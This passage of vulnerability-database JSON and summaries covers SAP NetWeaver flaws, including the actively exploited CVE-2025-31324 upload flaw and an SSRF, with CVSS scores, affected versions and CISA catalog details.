"cisaActionDue": "2025-05-20",
"cisaExploitAdd": "2025-04-29",
"cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.",
"cisaVulnerabilityName": "SAP NetWeaver Unrestricted File Upload Vulnerability",
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
},
{
"lang": "es",
"value": "SAP NetWeaver Visual Composer Metadata Uploader no cuenta con la protecci\u00f3n adecuada, lo que permite que agentes no autenticados carguen archivos binarios ejecutables potencialmente maliciosos que podr\u00edan da\u00f1ar gravemente el sistema host. Esto podr\u00eda afectar significativamente la confidencialidad, la integridad y la disponibilidad del sistema objetivo."
}
],
"id": "CVE-2025-31324",
"lastModified": "2025-10-31T21:56:14.103",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 6.0,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-04-24T17:15:35.913",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3594142"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://url.sap/sapsecuritypatchday"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Third Party Advisory"
],
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"US Government Resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-434"
}
],
"source": "cna@sap.com",
"type": "Secondary"
}
]
}
FKIE_CVE-2024-27898
Vulnerability from fkie_nvd - Published: 2024-04-09 01:15 - Updated: 2025-02-06 19:01
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.5:*:*:*:*:*:*:*",
"matchCriteriaId": "74F7C92A-48F7-456A-BDFF-91A482DE8546",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
},
{
"lang": "es",
"value": "La aplicaci\u00f3n SAP NetWeaver, debido a una validaci\u00f3n de entrada insuficiente, permite a un atacante enviar una solicitud manipulada desde una aplicaci\u00f3n web vulnerable dirigida a sistemas internos detr\u00e1s de firewalls que normalmente son inaccesibles para un atacante desde la red externa, lo que resulta en una vulnerabilidad Server-Side Request Forgery. Teniendo as\u00ed un bajo impacto en la confidencialidad."
}
],
"id": "CVE-2024-27898",
"lastModified": "2025-02-06T19:01:07.703",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-04-09T01:15:48.583",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3425188"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3425188"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "cna@sap.com",
"type": "Primary"
}
]
}
FKIE_CVE-2024-25644
Vulnerability from fkie_nvd - Published: 2024-03-12 01:15 - Updated: 2025-04-10 19:40
Severity ?
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Summary
Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"matchCriteriaId": "F2B37045-2FB7-49BB-AE38-B84FAA6ADFB0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Under certain conditions SAP NetWeaver\u00a0WSRM\u00a0- version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application."
},
{
"lang": "es",
"value": "Bajo ciertas condiciones, SAP NetWeaver WSRM - versi\u00f3n 7.50, permite que un atacante acceda a informaci\u00f3n que de otro modo estar\u00eda restringida, lo que causa un bajo impacto en la confidencialidad sin ning\u00fan impacto en la integridad y disponibilidad de la aplicaci\u00f3n."
}
],
"id": "CVE-2024-25644",
"lastModified": "2025-04-10T19:40:55.793",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "cna@sap.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2024-03-12T01:15:49.567",
"references": [
{
"source": "cna@sap.com",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3425682"
},
{
"source": "cna@sap.com",
"tags": [
"Vendor Advisory"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required"
],
"url": "https://me.sap.com/notes/3425682"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"sourceIdentifier": "cna@sap.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-732"
}
],
"source": "cna@sap.com",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Secondary"
}
]
}
CVE-2025-42968 (GCVE-0-2025-42968)
Vulnerability from cvelistv5 – Published: 2025-07-08 00:36 – Updated: 2025-07-08 16:13
VLAI?
Summary
SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.
Severity ?
5 (Medium)
CWE
- CWE-862 - Missing Authorization
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (RFC enabled function module) |
Affected:
SAP_BW 700
Affected: 701 Affected: 702 Affected: 710 Affected: 731 Affected: 740 Affected: 750 Affected: 751 Affected: 752 Affected: 753 Affected: 754 Affected: 755 Affected: 756 Affected: 757 Affected: 758 Affected: 816 Affected: 914 Affected: 916 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-42968",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-08T14:29:01.927973Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T16:13:36.672Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (RFC enabled function module)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "SAP_BW 700"
},
{
"status": "affected",
"version": "701"
},
{
"status": "affected",
"version": "702"
},
{
"status": "affected",
"version": "710"
},
{
"status": "affected",
"version": "731"
},
{
"status": "affected",
"version": "740"
},
{
"status": "affected",
"version": "750"
},
{
"status": "affected",
"version": "751"
},
{
"status": "affected",
"version": "752"
},
{
"status": "affected",
"version": "753"
},
{
"status": "affected",
"version": "754"
},
{
"status": "affected",
"version": "755"
},
{
"status": "affected",
"version": "756"
},
{
"status": "affected",
"version": "757"
},
{
"status": "affected",
"version": "758"
},
{
"status": "affected",
"version": "816"
},
{
"status": "affected",
"version": "914"
},
{
"status": "affected",
"version": "916"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver allows an authenticated non-administrative user to call the remote-enabled function module which could grants access to non-sensitive information about the SAP system and OS without requiring any specific knowledge or controlled conditions. This leads to a low impact on confidentiality with no effect on integrity or availability of the application."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-862",
"description": "CWE-862: Missing Authorization",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-08T00:36:31.953Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3621037"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing Authorization check in SAP NetWeaver (RFC enabled function module)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-42968",
"datePublished": "2025-07-08T00:36:31.953Z",
"dateReserved": "2025-04-16T13:25:42.158Z",
"dateUpdated": "2025-07-08T16:13:36.672Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-42999 (GCVE-0-2025-42999)
Vulnerability from cvelistv5 – Published: 2025-05-13 00:17 – Updated: 2025-10-21 22:55
VLAI?
Summary
SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.
Severity ?
9.1 (Critical)
CWE
- CWE-502 - Deserialization of Untrusted Data
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (Visual Composer development server) |
Affected:
VCFRAMEWORK 7.50
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-42999",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-17T03:55:58.995900Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-05-15",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T22:55:16.662Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-42999"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-05-15T00:00:00+00:00",
"value": "CVE-2025-42999 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-13T16:29:26.892Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Visual Composer development server)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "VCFRAMEWORK 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver Visual Composer Metadata Uploader is vulnerable when a privileged user can upload untrusted or malicious content which, when deserialized, could potentially lead to a compromise of confidentiality, integrity, and availability of the host system."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-502",
"description": "CWE-502: Deserialization of Untrusted Data",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-13T01:38:43.612Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3604119"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Insecure Deserialization in SAP NetWeaver (Visual Composer development server)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-42999",
"datePublished": "2025-05-13T00:17:43.710Z",
"dateReserved": "2025-04-16T13:25:50.942Z",
"dateUpdated": "2025-10-21T22:55:16.662Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-31324 (GCVE-0-2025-31324)
Vulnerability from cvelistv5 – Published: 2025-04-24 16:50 – Updated: 2025-10-21 22:55
VLAI?
Summary
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
Severity ?
10 (Critical)
CWE
- CWE-434 - Unrestricted Upload of File with Dangerous Type
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver (Visual Composer development server) |
Affected:
VCFRAMEWORK 7.50
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-31324",
"options": [
{
"Exploitation": "active"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-04-30T03:56:21.966706Z",
"version": "2.0.3"
},
"type": "ssvc"
}
},
{
"other": {
"content": {
"dateAdded": "2025-04-29",
"reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
},
"type": "kev"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-21T22:55:17.980Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"technical-description"
],
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
},
{
"tags": [
"government-resource"
],
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31324"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-04-29T00:00:00+00:00",
"value": "CVE-2025-31324 added to CISA KEV"
}
],
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-05-02T17:13:30.650Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "https://www.theregister.com/2025/04/25/sap_netweaver_patch/"
},
{
"url": "https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/"
},
{
"url": "https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/"
}
],
"title": "CVE Program Container",
"x_generator": {
"engine": "ADPogram 0.0.1"
}
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver (Visual Composer development server)",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "VCFRAMEWORK 7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-434",
"description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-04-24T16:50:27.706Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3594142"
},
{
"url": "https://url.sap/sapsecuritypatchday"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Missing Authorization check in SAP NetWeaver (Visual Composer development server)",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2025-31324",
"datePublished": "2025-04-24T16:50:27.706Z",
"dateReserved": "2025-03-27T23:02:06.906Z",
"dateUpdated": "2025-10-21T22:55:17.980Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27898 (GCVE-0-2024-27898)
Vulnerability from cvelistv5 – Published: 2024-04-09 00:52 – Updated: 2024-08-21 15:07
VLAI?
Summary
SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.
Severity ?
5.3 (Medium)
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | SAP NetWeaver |
Affected:
7.50
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:41:55.785Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://me.sap.com/notes/3425188"
},
{
"tags": [
"x_transferred"
],
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "netweaver",
"vendor": "sap",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27898",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-21T15:05:55.533542Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-21T15:07:15.427Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "SAP NetWeaver",
"vendor": "SAP_SE",
"versions": [
{
"status": "affected",
"version": "7.50"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\u003c/p\u003e"
}
],
"value": "SAP NetWeaver application, due to insufficient input validation, allows an attacker to send a crafted request from a vulnerable web application targeting internal systems behind firewalls that are normally inaccessible to an attacker from the external network, resulting in a\u00a0Server-Side Request Forgery vulnerability. Thus, having a low impact on confidentiality.\n\n"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "eng",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-09T00:52:54.390Z",
"orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"shortName": "sap"
},
"references": [
{
"url": "https://me.sap.com/notes/3425188"
},
{
"url": "https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Server-Side Request Forgery in SAP NetWeaver",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
"assignerShortName": "sap",
"cveId": "CVE-2024-27898",
"datePublished": "2024-04-09T00:52:54.390Z",
"dateReserved": "2024-02-27T06:26:16.786Z",
"dateUpdated": "2024-08-21T15:07:15.427Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-25644 (GCVE-0-2024-25644)
Vulnerability from cvelistv5 – Published: 2024-03-12 00:33 – Updated: 2024-09-28 22:24
VLAI?
Summary
Under certain conditions SAP NetWeaver WSRM - version 7.50, allows an attacker to access information which would otherwise be restricted, causing low impact on Confidentiality with no impact on Integrity and Availability of the application.
Severity ?
5.3 (Medium)
CWE
- CWE-732 - Incorrect Permission Assignment for Critical Resource
Assigner
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| SAP_SE | NetWeaver (WSRM) |
Affected:
7.50
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-01T23:44:09.806Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
